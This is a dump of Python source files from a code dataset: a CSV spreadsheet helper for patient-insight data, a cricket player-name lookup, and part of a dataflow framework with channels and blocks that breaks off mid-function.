\"Prototype\"\n\n\n# default required values\nPATH = Path.cwd()\n_DEFAULT_SPREADSHEET = PATH / Path(\"data\") / Path(\"insights.csv\")\n_DEFAULT_TEXT_LENGTH = 30\n\nCATEGORIES = [\"Comparing Therapies\", \"Side Effects\", \"Right treatment?\", \"Specific Therapy Inquiries\",\n \"Others' experience\", 'Symptoms diagnosis', 'Side effect management', 'Recurrence Queries',\n 'Specific Conditions', 'Data interpretation', 'Referral', 'Lifestyle', 'Positive Affirmations',\n 'Encouragement', 'Inter-Personal Patient Connections', 'Other/ Miscellaneous']\nSTAGES = ['Stage 0', 'Stage 1', 'Stage 1A', 'Stage 1B', 'Stage 2', 'Stage 2A',\n 'Stage 2B', 'Stage 3', 'Stage 3A', 'Stage 3B', 'Stage 3C', 'Stage 4']\n\n_NORM_HEADERS = {'id': 'id', 'Topic': 'topic', 'Date Discussion (Month/Year)': 'date', 'Query Tag': 'query_tag',\n 'Patient Query/inquiry': 'query', 'Specific Patient Profile': 'profile',\n 'Patient Cohort (Definition)': 'cohort', 'Tumor (T)': 'tumor', 'Tumor Count': 'tumor_count',\n 'Node (N)': 'node', 'Metastasis (M)': 'metastasis', 'Grade': 'grade', 'Recurrence': 'recurrence',\n 'Category Tag': 'category', 'Intervention': 'intervention', 'Associated Side effect': 'side_effects',\n 'Intervention mitigating side effect': 'int_side_effects', 'Patient Insight': 'insights',\n 'Volunteers': 'volunteers', 'Discussion URL': 'url', 'HER2': 'HER2', 'HER': 'HER', 'BRCA': 'BRCA',\n 'ER': 'ER', 'HR': 'HR', 'PR': 'PR', 'RP': 'RP', 'RO': 'RO'}\n_NODE_HEADER = {'id': 'ID', 'topic': 'Topic', 'date': 'Date', 'query_tag': 'Query Tag', 'query': 'Query',\n 'profile': 'Profile', 'cohort': 'Cohort', 'tumor': 'T', 'tumor_count': 'T Count', 'node': 'N',\n 'metastasis': 'M', 'grade': 'Grade', 'recurrence': 'Recurr', 'category': 'Category',\n 'intervention': 'Intervention', 'side_effects': 'Side Effect', 'int_side_effects': 'Int. Side Eff.',\n 'insights': 'Insights', 'volunteers': 'Volunt.', 'url': 'URL', 'HER2': 'HER2', 'HER': 'HER',\n 'BRCA': 'BRCA', 'ER': 'ER', 'HR': 'HR', 'PR': 'PR', 'RP': 'RP', 'RO': 'RO'}\n\n\n\nclass Spreadsheet:\n \"\"\"\n If DEFAULT_SPREADSHEET and NORM_HEADERS are kept, 'Patient Insights - Insights.csv' will\n be the CSV that it will be reading. Else, replace with a file in the same directory or specified path.\n NORM_HEADERS truncates the fieldnames to a single word without spaces, this is important if integrating\n with flask (can't use the . function on variables with white space).\n Ex:\n from Spreadsheet import Spreadsheet\n sheet = Spreadsheet()\n sheet = Spreadsheet('Patient Insights - Insights.csv')\n sheet = Spreadsheet('Patient Insights - Insights.csv', NORM_HEADERS) # assume NORM_HEADERS is defined\n sheet['topic'] = ['About to start Radiation ... Need advice on what to expect', 'Afinitor T...\n sheet[0] = ['About to start Radiation ... Need advice on what to expect', 'Dec 2016...\n [row for row in sheet] -> [['About to start Radiation ... Need advice on what to expect', 'Dec 2016', 'what...\n 'topic' in sheet\n 'August 2018' in sheet\n print(sheet)\n \"\"\"\n def __init__(self, spreadsheet=_DEFAULT_SPREADSHEET, headers=_NORM_HEADERS):\n self.smart_sheet = []\n self.name = spreadsheet\n self.real_headers = None\n self.__norm_headers = headers\n self.headers = None\n self.__book = None\n self.__spreadsheet = []\n self.__index = 0\n if spreadsheet is not None:\n self.__assemble(spreadsheet)\n if self.__norm_headers is not None:\n self.__normalize(headers)\n else:\n self.headers = self.real_headers\n self.testing = False\n\n def keys(self):\n return self.headers\n\n def exists(self, item=None):\n if item is None:\n return self.__spreadsheet is not None\n else:\n return self.has(item)\n\n def has(self, item):\n if isinstance(item, str):\n if item in self.headers or item in self.real_headers:\n return True\n else:\n for rows in self.__spreadsheet:\n if item in rows:\n return True\n return False\n elif isinstance(item, list):\n if len(item) == 0:\n return False\n elif isinstance(item[0], str):\n items_non_headers = [e for e in item if e not in self.headers and e not in self.real_headers]\n result = dict(zip(items_non_headers, [False]*len(items_non_headers)))\n for rows in self.__spreadsheet:\n for element in items_non_headers:\n if element in rows:\n result[element] = True\n if all(result.values()):\n return True\n return False\n else:\n return self.__has_all(item)\n elif isinstance(item, dict):\n if len(item) == 0:\n return False\n has_all = True\n for keys in item.values():\n if keys not in self.headers or keys not in self.real_headers:\n return False\n else:\n if isinstance(item[keys], list):\n for rows in item[keys]:\n if rows not in self[keys]:\n return False\n elif isinstance(item[keys], str):\n if not item[keys] in self[keys]:\n return False\n return has_all\n else:\n return False\n\n def __at(self, item):\n #TODO: get the index of an item\n #TODO: if entire row matches, get the row index\n #TODO: if only one field matches, get the row,column tuple\n #TODO: if part of the field matches, get the sliced ([:,1] or [2,4])\n #TODO: to return slice, return s = slice(2, 4) or return (s.start, s.stop)\n return None\n\n def getColumn(self, fieldname):\n return [item[self.__book[fieldname]] for item in self.__spreadsheet]\n\n def find(self, value):\n return [rows for rows in self.__spreadsheet if value in rows]\n\n def convertToDict(self, item=None):\n if item is None:\n columns = [self[col] for col in self.headers]\n return dict(zip(self.headers, columns))\n elif isinstance(item, list) and len(item) > 0:\n if isinstance(item[0], list) and len(item[0]) > 0:\n return [dict(zip(self.headers, value)) for value in item]\n elif not isinstance(item[0], list):\n return dict(zip(self.headers, item))\n return None\n\n def textLength(self, text, length=_DEFAULT_TEXT_LENGTH):\n if isinstance(text, list):\n return [value[:length] + '...' if len(value) > length else value for value in text]\n elif isinstance(text, str):\n if len(text) > length:\n return text[:length] + '...'\n else:\n return text\n else:\n return ''\n\n def max_results(self, min_value=4):\n omit = list(set(self['volunteers'] + self['comments'] + self['professor_comments']))\n items = set([x for element in self.__spreadsheet for x in element if x not in omit])\n dict_items = {}\n for element in items:\n length = len(self.find([element]))\n if length > min_value:\n if length not in dict_items:\n dict_items[length] = [element]\n else:\n dict_items[length].append(element)\n return dict_items\n\n def __like(self, string, compare):\n if len(string) > len(compare):\n added_len = abs(len(string) - len(compare))\n shortest = string if len(string) < len(compare) else compare\n compare = string if len(string) > len(compare) else compare\n string = list(shortest) + ([None] * added_len)\n combined = list(zip(compare, string))\n len_combined = len(combined)\n equality = sum([1 if elem[0] == elem[1] else 0 for elem in combined])\n return equality / len_combined\n\n def __contains_like(self, string, compare):\n equality = sum([1 if letter in compare else 0 for letter in string])\n return equality / len(string)\n\n def __intersection(self, raw, required, exact=False):\n result = []\n req = [elem.lower() for elem in required]\n raw = [elem.split(';') for elem in raw]\n for item in raw:\n adding = []\n for words in item:\n if len(words) > 0:\n if words.lower() in req:\n adding.append(words)\n elif not exact:\n words = words.lower().strip().replace('/', ' ').replace('\\n', ' ')\n for capital in req:\n tag = capital.lower()\n if tag not in adding:\n if words in tag:\n adding.append(tag)\n elif self.__like(words, tag) > 0.85:\n adding.append(tag)\n elif self.__contains_like(words, tag) > 0.85:\n div = 1.5\n end = int(len(words) // div)\n start = 0\n while end < len(words) and start < len(words):\n if words[start:end] in tag and tag not in adding:\n adding.append(tag)\n end += 1\n start += 1\n result.append(adding)\n return result\n\n def __has_all(self, item):\n has_all = True\n for index in item:\n if not self.has(index):\n return False\n return has_all\n\n def __assemble(self, spreadsheet):\n with open(Path(spreadsheet), 'r', newline=\"\", encoding=\"utf-8\") as f:\n content = csv.DictReader(f)\n self.real_headers = content.fieldnames\n self.__book = {header: index for index, header in enumerate(self.real_headers)}\n self.__spreadsheet = [list(element.values()) for element in content]\n\n def __normalize(self, headers):\n if headers is None:\n if self.real_headers == list(self.__norm_headers.values()):\n self.headers = list(self.__norm_headers.keys())\n else:\n if isinstance(headers, list):\n if len(headers) == len(self.real_headers):\n self.headers = headers\n elif isinstance(headers, dict):\n if list(headers.keys()) == self.real_headers:\n self.headers = list(headers.values())\n\n if self.headers is None:\n self.headers = self.real_headers\n self.__book = {head: index for index, head in enumerate(self.headers)}\n\n def __replace(self, arr, list_of_values):\n for i in range(len(arr)):\n for item in list_of_values:\n arr[i] = arr[i].lower().replace(*item)\n return arr\n\n def __contains__(self, item):\n return self.has(item)\n\n def __getitem__(self, item):\n if isinstance(item, str):\n if self.headers is not None and item in self.headers:\n return self.getColumn(item)\n elif item in self.real_headers:\n return self.getColumn(self.__norm_headers[item])\n else:\n return self.find(item)\n elif isinstance(item, tuple):\n pos1, pos2 = item\n if isinstance(pos1, str) and isinstance(pos2, str):\n return [element.values() for element in self.__spreadsheet if element[pos1] == pos2]\n elif isinstance(pos1, int) and isinstance(pos2, str):\n return self.__spreadsheet[pos1 - 1][pos2]\n elif isinstance(item, int) or isinstance(item, slice):\n return self.__spreadsheet[item]\n\n def __len__(self):\n return len(self.__spreadsheet)\n\n def __iter__(self):\n self.__index = 0\n return self\n\n def __next__(self):\n if self.__index >= len(self.__spreadsheet):\n raise StopIteration\n item = self.__spreadsheet[self.__index]\n self.__index += 1\n return item\n\n def __call__(self, spreadsheet=_DEFAULT_SPREADSHEET):\n with open(Path(spreadsheet), 'r', newline=\"\", encoding=\"utf-8\") as f:\n content = csv.DictReader(f)\n for element in content:\n temp = list(element.values())\n if temp not in self.__spreadsheet:\n self.__spreadsheet.append(temp)\n\n def __format__(self, format_spec):\n #TODO: \"Sheet has at columns topic: {a}\".format('column')\"\n pass\n\n def __str__(self):\n table = PrettyTable(['index'] + self.real_headers)\n for head in self.real_headers:\n table.align[head] = 'l'\n for i, content in enumerate(self.__spreadsheet):\n table.add_row([str(i)] + self.textLength(content))\n return str(table)\n\n\ndef main():\n try:\n message = \"Initializing with arguments: Spreadsheet(DEFAULT_SPREADSHEET, NORM_HEADERS)\"\n sheet = Spreadsheet(_DEFAULT_SPREADSHEET, _NORM_HEADERS)\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"Initializing default constructor: Spreadsheet()\"\n sheet = Spreadsheet()\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"Iterating through first 3 rows in Spreadsheet\"\n assert len(sheet[:3]) == 3\n for row in sheet[:3]:\n pass\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"Find row with 'Specific Therapy Inquries'\"\n assert len(sheet['Specific Therapy Inquries']) > 0\n print('\\t' + str(sheet['Specific Therapy Inquries']))\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"Find something that doesn't exist\"\n assert len(sheet['it shouldnt exist']) == 0\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"First item in the Spreadsheet\"\n print('\\t' + str(sheet[0]))\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"Printing the table\"\n response = input(\"Would you like to print the table?\")\n if 'y' in response.lower():\n print(sheet)\n\n except Exception:\n print('\\033[1m' + '\\033[31m' + \"FAIL:\" + message + '\\033[0m')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Spreadsheet.py","file_name":"Spreadsheet.py","file_ext":"py","file_size_in_byte":15470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"198053459","text":"#!/usr/bin/env python3\n\nimport pickle\n\ndef find_name(user_input, data_dir=\"./database/\", ipl=False, t20=False):\n user_input_lower = user_input.lower()\n\n if ipl:\n df_bat = pickle.load(open(data_dir+'03_ipl/batting.df', 'rb'))\n df_bowl = pickle.load(open(data_dir+'03_ipl/bowling.df', 'rb'))\n elif t20:\n df_bat = pickle.load(open(data_dir+'01_t20s/batting.df', 'rb'))\n df_bowl = pickle.load(open(data_dir+'01_t20s/bowling.df', 'rb'))\n\n all_batsman = list(df_bat['batsman'].values )\n all_bowlers = list(df_bowl['bowler'].values )\n\n all_player = list(set(all_batsman + all_bowlers ))\n \n all_player_lower = [x.lower() for x in all_player]\n lower_name_dict = {x.lower() : x for x in all_player}\n last_name_dict = {all_player_lower[i].split()[-1]: all_player[i] for i in range(len(all_player))}\n\n if user_input in all_player:\n return user_input\n elif user_input_lower in all_player_lower:\n return lower_name_dict[user_input_lower]\n elif user_input_lower in last_name_dict.keys():\n return last_name_dict[user_input_lower]\n return None\n\nif __name__==\"__main__\":\n\n user_input = \"Rohit Sharma\"\n name = find_name(user_input, t20=True)\n print (name)\n\n","sub_path":"find_name.py","file_name":"find_name.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"570972719","text":"#!/usr/bin/env python\n\n\"\"\"\n.. module:: core\n :synopsis: conduit core module\n\n\"\"\"\n\nfrom util import comparable_interface\nimport datetime\nimport random\nimport logging\nimport abc\nimport copy\nimport Queue\nimport isodate\n\nrandom.seed(0)\n\nSTART = isodate.parse_date('2010-03-01')\nDAY = datetime.timedelta(days=1)\nHOUR = datetime.timedelta(hours=1)\n\nWEIGHT = 50000000\n\nclass Data(comparable_interface.Comparable):\n \"\"\"\n The Data class acts as a struct containing user data and a timestamp. Data objects are passed from block to block\n by way of channels.\n \"\"\"\n\n def __init__(self, time, data):\n self.time = time\n self.data = data\n\n def __nonzero__(self):\n \"\"\"\n The validity of Data objects depends on them having a valid timestamp. This method defines the behavior\n when a Data object is referred to in a boolean context.\n \"\"\"\n return bool(self.time)\n\n def __repr__(self):\n return \"Data(time=\" + str(self.time) + \", data=\" + str(self.data) + \")\"\n\n def _cmpkey(self):\n \"\"\"\n Provided for the functionality in comparable_interface.\n Comparisons on Data objects will use the time field.\n So, for example, to get the Data object with the earliest time stamp from a list of Data objects,\n just call min(list_of_Data_objects).\n \"\"\"\n return self.time\n\n\nclass Channel(comparable_interface.Comparable):\n \"\"\"\n A channel must have exactly one input block (the producer) and may have zero or more output blocks (consumers).\n When the producer uses the is_open() method to ask the channel whether new data can be shoved into the channel,\n it is asking whether all consumers have pulled a copy of the data.\n \"\"\"\n\n def __init__(self):\n self.value = None\n self.consumers = {} # Key = Datablock object, Value = boolean indicating whether they're ready for more data\n self.producer = None\n self.debug_name_string = None\n self.active = False\n\n def _cmpkey(self):\n \"\"\"\n Provided for the functionality in comparable_interface.\n Comparisons on Data objects will use the time field.\n So, for example, to get the Data object with the earliest time stamp from a list of Data objects,\n just call min(list_of_Data_objects).\n \"\"\"\n return self.value\n\n def __repr__(self):\n \"\"\"\n __repr__ is overloaded in order to simplify debugging.\n \"\"\"\n return self.debug_name()\n\n def set_debug_name(self, name):\n \"\"\"\n set_debug_name overrides the return value of str(self).\n To return this to what the user of a python debugger would normally expect, run:\n c.set_debug_name('<%s.%s object at %s>' % (c.__class__.__module__, c.__class__.__name__, hex(id(c))))\n assuming your channel object is referred to by variable c.\n \"\"\"\n self.debug_name_string = name\n\n def debug_name(self):\n if self.debug_name_string:\n return self.debug_name_string\n else:\n return \"Channel connecting \" + str(self.producer) + \" to \" + str(self.consumers)\n\n def time(self):\n return self.value.time\n\n def get_value(self, consumer=None):\n \"\"\"\n If consumer is specified, the channel will record that consumer as having consumed the value.\n \"\"\"\n if consumer:\n self.consumers[consumer] = True\n return self.value\n\n def set_value(self, value):\n self.value = value\n self.active = True\n logging.debug(\"# Setting value in <\" + str(self) + \">: \" + str(self.value))\n self.mark_consumer_plates_full()\n\n def activate(self):\n self.active = True\n\n def deactivate(self):\n self.active = False\n\n def has_data(self):\n return self.value is not None\n\n def is_open(self):\n for ready_for_more_data in self.consumers.values():\n if not ready_for_more_data:\n return False\n return True\n\n def mark_consumer_plates_full(self):\n self.set_consumer_status(False)\n\n def mark_consumers_hungry_for_more(self):\n self.set_consumer_status(True)\n\n def set_consumer_status(self, status, consumer=None):\n if consumer:\n self.consumers[consumer] = status\n else:\n for consumer in self.consumers.keys():\n self.consumers[consumer] = status\n\n def add_producer(self, producer):\n self.producer = producer\n\n def add_consumer(self, consumer):\n self.consumers[consumer] = True\n\n def get_consumers(self):\n \"\"\"\n consumers are currently just DataBlock objects. There's still an open question as to whether we will need\n both the DataBlock and the channel name on which it is subscribing to this information.\n \"\"\"\n return self.consumers.keys()\n\n\nclass Connectable():\n \"\"\"\n Connectable objects are designed to enable syntax helpers for wiring blocks together.\n \"\"\"\n def __init__(self, block, channel_name):\n self.block = block\n self.channel_name = channel_name\n\n def __rshift__(self, other):\n connect(self.block, self.channel_name, other.block, other.channel_name)\n return other\n\n\nclass DataBlock():\n \"\"\"\n User implementations of data blocks should derive from the DataBlock class and implement the block_code()\n instance method. The block_code() method will be called after some preamble code whenever the block is driven\n by a call to its step() method.\n \"\"\"\n\n __metaclass__ = abc.ABCMeta # Defined so that we can mark block_code() as an abstract method\n\n def __init__(self):\n self.input_channels = {} # Keys = channel name, Values = Channel objects\n self.input_data = {} # Keys = channel name, Values = Data objects\n self.output_channels = {} # Keys = channel name, Values = Channel objects\n self.priority = 100 # Lower numbers have higher priority\n # The execution of each iteration of a block has a specific definition of \"now\".\n self.time = 0\n self.termination_reached = False\n self.debug_name = '<%s.%s object at %s>' % (self.__class__.__module__, self.__class__.__name__, hex(id(self)))\n self.start_time = None\n self.end_time = None\n self.block_initialization()\n\n def __repr__(self):\n \"\"\"\n __repr__ is overloaded in order to simplify debugging.\n self.debug_name defaults to what would ordinarily be seen as a response to self.__repr__ but user code\n can call set_debug_name() to override this, and we take advantage of it in the subclasses that enable\n syntax helpers for defining blocks.\n \"\"\"\n return self.debug_name\n\n def __cmp__(self, other):\n \"\"\"\n Comparison operator is provided so that blocks can have different priorities for execution order.\n TODO: Code that actually uses priorities has been removed, so we may consider getting rid of this.\n \"\"\"\n return cmp(self.priority, other.priority)\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Defining __call__ makes it possible to let users take advantage of this connection syntax:\n \"\"\"\n return Connectable(self, args[0])\n\n def set_debug_name(self, name):\n self.debug_name = name\n\n def terminate(self):\n self.termination_reached = True\n for channel_name in self.output_channels.keys():\n self.output_channels[channel_name].deactivate()\n\n def terminated(self):\n return self.termination_reached\n\n def increment_time(self):\n if isinstance(self.time, int):\n # If time isn't an int, user has overridden it, and it will be up to them to increment time.\n self.time += 1\n\n def set_start(self, start):\n self.start_time = start\n\n def set_end(self, end):\n self.end_time = end\n\n def _before_valid_time_range(self):\n \"\"\"\n In case of uncertainty (times not specified), we assume that we are in a valid range.\n \"\"\"\n if self.start_time is not None:\n try:\n if self.time < self.start_time:\n return True\n except TypeError:\n return False\n return False\n\n def _after_valid_time_range(self):\n \"\"\"\n In case of uncertainty (times not specified), we assume that we are in a valid range.\n \"\"\"\n if self.end_time is not None:\n try:\n if self.time > self.end_time:\n return True\n except TypeError:\n return False\n return False\n\n def _in_valid_time_range(self):\n \"\"\"\n If start_time or end_time is set and current time is outside the specified range, return False.\n If time window is not comparable with current time (as would be the case if user code specifies the time to\n be of a different type), we have not gotten far enough into the process to make a decision, and default to True.\n All other cases return True.\n \"\"\"\n if self._before_valid_time_range() or self._after_valid_time_range():\n return False\n else:\n return True\n\n def set_input_data(self, key, value):\n \"\"\"\n set_input_data will automatically create an input channel if necessary.\n Automatic channel creation is intended for the case where users are trying to set initial values on a block\n whose input channels aren't subscribed to anything in the graph.\n \"\"\"\n if not key in self.input_channels.keys():\n self.set_input_channel(key, Channel())\n self.input_channels[key].set_value(Data(self.time, value))\n\n def _get_input_data_object(self, key):\n \"\"\"\n _get_input_data_object() not typically used by user-defined subclasses, because it retrieves data objects from\n all input channels, as opposed to data objects that have already been pulled into block-local storage from those\n input channels.\n \"\"\"\n return self.input_channels[key].get_value(self)\n\n def get_input(self, key):\n \"\"\"\n get_input() only looks at data that has already been pulled from a channel.\n \"\"\"\n return self.input_data[key].data\n\n def _get_all_input_data_objects(self):\n inputs = {}\n for input_name in self.input_channels.keys():\n inputs[input_name] = self.input_channels[input_name].get_value(self)\n return inputs\n\n def _get_all_input_values(self):\n input_values = {}\n for input_name in self.input_channels.keys():\n channel = self.input_channels[input_name]\n data_object = channel.get_value(self)\n input_values[input_name] = data_object.data\n return input_values\n\n def clear_inputs(self):\n for input_channel in self.input_channels.values():\n input_channel.set_readiness(False, self)\n\n def clear_outputs(self):\n for output_channel in self.output_channels.values():\n output_channel.set_readiness(False)\n\n def set_output_data(self, key, value):\n self.get_output_channel(key).set_value(Data(self.time, value))\n\n def read_output_data(self, key=None):\n if key:\n return self.output_channels[key].get_value()\n else:\n output_data = {}\n for channel_name in self.output_channels.keys():\n output_data[channel_name] = self.output_channels[channel_name].get_value()\n return output_data\n\n def get_output_channel(self, output_channel_name):\n \"\"\"\n get_output_channel will create a new channel object if necessary.\n \"\"\"\n if not output_channel_name in self.output_channels.keys():\n self.output_channels[output_channel_name] = Channel()\n self.output_channels[output_channel_name].add_producer(self)\n return self.output_channels[output_channel_name]\n\n def pass_data_through(self, data=None):\n if data:\n for channel_name in data.keys():\n self.set_output_data(channel_name, data[channel_name])\n else:\n for channel_name in self.input_channels.keys():\n self.set_output_data(channel_name, self.read_input_data(channel_name))\n\n def set_input_channel(self, input_channel_name, channel):\n self.input_channels[input_channel_name] = channel\n channel.add_consumer(self)\n\n def get_input_channel_names(self):\n return self.input_channels.keys()\n\n def get_output_channel_names(self):\n return self.output_channels.keys()\n\n def advance_self_to_latest_time_of_pulled_data(self):\n for data_object in self.input_data.values():\n if not isinstance(data_object.time, int) and isinstance(self.time, int):\n # User has overridden time to be a new type. It would be cleaner to set a flag indicating\n # that a user has overridden it, and possibly store the value in a different variable, but\n # that approach has the cost that we would have to pass the flag through the channels with each\n # message.\n self.time = data_object.time\n continue\n if data_object.time > self.time:\n self.time = data_object.time\n\n def step(self):\n \"\"\"\n Returns a set of DataBlocks whose inputs were updated. This will be used by the Graph run() method to invoke\n the step() method of the next blocks in the chain (we don't invoke those call the step() method of those\n blocks directly from here, because then the stack could get quite large).\n \"\"\"\n # This method will typically have been called by the scheduler as a result of either (A) this block\n # is registered at the head of the graph, or (B) there is a state change in the inputs.\n #\n # 1. Check to see whether downstream (output) channels are accepting input (all of the channel's\n # consumers have pulled the \"next\" value).\n # If any output channel is not accepting input, abort.\n # 2. Find minimum time in the \"next\" fields of all of my own input channels. Pull that time\n # (or times -- in a tie, everybody wins) into my own \"current\" fields and look for state changes.\n # If no state changes, abort.\n # 3. Check whether all inputs are satisfied. If any are unsatisfied, abort.\n # 4. Execute user code (which fills downstream channels \"next\" fields)\n # 5. For each downstream channel, append all consumers to return value.\n # 6. Return set of downstream blocks that are candidates for execution.\n\n\n\n # REPLACEMENT FOR STEP 5:\n # Logic for execution flow WAS to:\n # Execute a block. Look at all output channels to which the block provided data on that iteration.\n # For each of those channels, nominate each of their consumers as candidates for running next.\n # Trigger the set of unique candidates.\n # The problem with this logic is that channels now buffer data, possibly for multiple iterations.\n # The downstream blocks aren't always eligible to execute right away, and we basically forget to execute\n # them on future iterations (because if they aren't provided new input, they won't be candidates, but\n # they may legitimately need to pull data from their input channel buffers and execute).\n #\n # So instead of all that fancy logic, we basically say screw it. Traverse the whole graph and offer\n # everybody the chance to run -- including blocks that are downstream of some that do not run on this iteration!\n\n downstream_blocks = []\n\n\n # Restrict the set of input channels we consider to those that are active (a channel is typically deactivated\n # before it starts producing useful data, and after it has reached the end of useful data)\n active_input_channels = {}\n active_input_channels_names = [channel_name for channel_name in self.input_channels.keys()\n if self.input_channels[channel_name].active]\n active_input_channels = {name:self.input_channels[name] for name in active_input_channels_names}\n\n # If this is a block that has one or more input channels but none of them are active, bail out:\n if self.input_channels and not active_input_channels:\n return downstream_blocks\n\n # 2. Pull data for earliest time. If there are no input channels, we just proceed:\n unprocessed_input_channels = {}\n if active_input_channels:\n\n # Get the collection of channels from which I have not already consumed data:\n unprocessed_input_channel_names = [channel_name for channel_name in active_input_channels.keys()\n if not active_input_channels[channel_name].consumers[self]]\n unprocessed_input_channels = {name:active_input_channels[name] for name in unprocessed_input_channel_names}\n unprocessed_channel_with_earliest_data = min(unprocessed_input_channels.values())\n if not unprocessed_input_channels:\n # If I have some input channels but none of them are unprocessed, then there is no data to be pulled\n # and I must be done.\n return downstream_blocks\n\n if unprocessed_input_channels:\n state_change = False\n for input_channel_name in unprocessed_input_channels.keys():\n if unprocessed_input_channels[input_channel_name] <= unprocessed_channel_with_earliest_data:\n new_data = unprocessed_input_channels[input_channel_name].get_value(self) # gets value AND marks as consumed.\n logging.debug(\"==> Pulling data (\" + str(new_data.data) + \") from channel '\" +\n input_channel_name + \"' -- \" + str(self))\n if (not self.input_data) or \\\n (not input_channel_name in self.input_data) or \\\n self.input_data[input_channel_name] != new_data:\n state_change = True\n self.input_data[input_channel_name] = new_data\n if not state_change:\n return downstream_blocks\n self.advance_self_to_latest_time_of_pulled_data()\n\n for input_name in self.input_data.keys():\n logging.debug(\"# BLOCK \" + str(self) + \": time=\" + str(self.time) + \", \" + str(input_name) + \" = \" +\n str(self.input_data[input_name]))\n\n # 3. Ensure inputs satisfied (note that we want input data for all channels, not just those currently active):\n if self.input_channels:\n for input_channel_name in self.input_channels.keys():\n if input_channel_name not in self.input_data.keys():\n logging.debug(\" Channel \" + input_channel_name + \" not satisfied. Bailing out.\")\n return downstream_blocks\n\n # Ensure at least one downstream channel is open.\n # Note that this has to happen after pulling data from the input channels in order to properly accommodate the\n # case in which a block consumes its own outputs.\n at_least_one_channel_open = False\n for output_channel in self.output_channels.values():\n if output_channel.is_open():\n at_least_one_channel_open = True\n break\n if not at_least_one_channel_open:\n return downstream_blocks\n\n # 4. Execute user code:\n logging.debug(\"Executing block code for: \" + str(self))\n self.block_code() # the block_code() method is responsible for setting new values in the output channels\n # logging.debug(\"After executing user code, block time is: \" + str(self.time))\n\n for output_channel in self.output_channels.values():\n if self._in_valid_time_range():\n for consumer in output_channel.get_consumers():\n # logging.debug(str(self) + \" is nominating block to append to run list: \" + str(consumer))\n downstream_blocks.append(consumer)\n else:\n output_channel.mark_consumers_hungry_for_more()\n if self._after_valid_time_range():\n self.terminate()\n\n # 6. Return collection of downstream neighbors:\n return downstream_blocks\n\n def block_initialization(self):\n return\n\n def set_input_connection(self, channel_name, channel):\n self.input_channels[channel_name] = channel\n\n def set_output_connection(self, source_channel, destination_block, destination_channel):\n self.output_channels[source_channel] = [destination_block, destination_channel]\n # self.set_output_data(source_channel, None)\n\n @abc.abstractmethod\n def block_code(self):\n return\n\n\nclass BaseFilter(DataBlock):\n\n def __repr__(self):\n \"\"\"\n __repr__ is overloaded in order to simplify debugging.\n \"\"\"\n return \"Filter that wraps predicate \" + str(self.predicate)\n\n @abc.abstractmethod\n def predicate(self):\n return False\n\n def block_code(self):\n if self.predicate():\n self.pass_data_through()\n else:\n self.clear_outputs()\n self.clear_inputs()\n\n\nclass Block(DataBlock):\n \"\"\"\n User function should return a map of output arg names and values.\n \"\"\"\n\n def __init__(self, user_function):\n DataBlock.__init__(self)\n self.user_function = user_function\n self.clear_inputs()\n self.debug_name = \"Block that wraps \" + str(self.user_function)\n\n for argname in user_function.func_code.co_varnames:\n # We only need to handle the implicitly defined inputs. All others are defined by the graph connections:\n if argname == 'previous_outputs':\n # Blocks implicitly subscribe to their own outputs, but this information is clobbered if they also\n # subscribe to some other block's outputs on the same input channel. Note that this ordering guarantee\n # needs to be inspected more closely if we start doing things in parallel.\n self.set_input_channel(argname, self.get_output_channel(argname))\n self.set_input_data(argname, {})\n\n def block_code(self):\n inputs = self._get_all_input_values()\n outputs = self.user_function(**inputs)\n if outputs:\n for key in outputs.keys():\n self.set_output_data(key, outputs[key])\n if 'previous_outputs' in self.output_channels.keys():\n self.output_channels['previous_outputs'].set_value(Data(self.time, copy.deepcopy(outputs)))\n\n\nclass GeneratorBlock(Block):\n def __init__(self, user_function):\n Block.__init__(self, user_function)\n self.first_time = True\n\n def block_code(self):\n inputs = self._get_all_input_values()\n outputs = {}\n \"\"\"\n self.f = self.user_function(**inputs)\n try:\n outputs = self.f.send(inputs)\n except StopIteration:\n self.terminate()\n \"\"\"\n if self.first_time:\n self.f = self.user_function(**inputs)\n outputs = self.f.next()\n self.first_time = False\n else:\n try:\n outputs = self.f.send(inputs)\n except StopIteration:\n self.terminate()\n\n if outputs:\n for key in outputs.keys():\n self.set_output_data(key, outputs[key])\n if 'previous_outputs' in self.output_channels.keys():\n self.output_channels['previous_outputs'].set_value(Data(self.time, copy.deepcopy(outputs)))\n\nclass Filter(Block):\n \"\"\"\n User function should return a Boolean.\n If True, all input args will be passed unmodified as output args.\n If False, all output args will have a value of None.\n \"\"\"\n def block_code(self):\n inputs = self._get_all_input_values()\n filter_result = self.user_function(**inputs)\n if filter_result:\n self.pass_data_through(inputs)\n else:\n self.clear_outputs()\n\nclass PassThrough(Block):\n \"\"\"\n User function need not return anything. We just pass all inputs to outputs.\n If True, all input args will be passed unmodified as output args.\n If False, all output args will have a value of None.\n \"\"\"\n def block_code(self):\n inputs = self._get_all_input_values()\n filter_result = self.user_function(**inputs)\n self.pass_data_through(inputs)\n\n\nclass Terminator(Block):\n \"\"\"\n Terminator is a convenient mechanism for setting global termination conditions.\n Just provide a predicate that returns a boolean.\n \"\"\"\n\n def block_code(self):\n inputs = self._get_all_input_values()\n filter_result = self.user_function(**inputs)\n if filter_result:\n self.pass_data_through(inputs)\n else:\n self.clear_outputs()\n\n\nclass MasterControlBlock(DataBlock):\n \"\"\"\n The MasterControlBlock provides a way to kill the simulation.\n Simply set a non-True value on its 'continue' input channel.\n The block is somewhat unique in that it acts immediately when an input value is set. This guarantees that it\n executes before other blocks that are peers in the graph (the usual approach is that all inputs for all peers\n get set in arbitrary order and then -- again in arbitrary order -- the step() method is called for all peers).\n \"\"\"\n def block_initialization(self):\n self.priority = 0 # Lower numbers have higher priority\n\n def block_code(self):\n if not self.read_input_data('continue'):\n graph = self.read_input_data('graph')\n 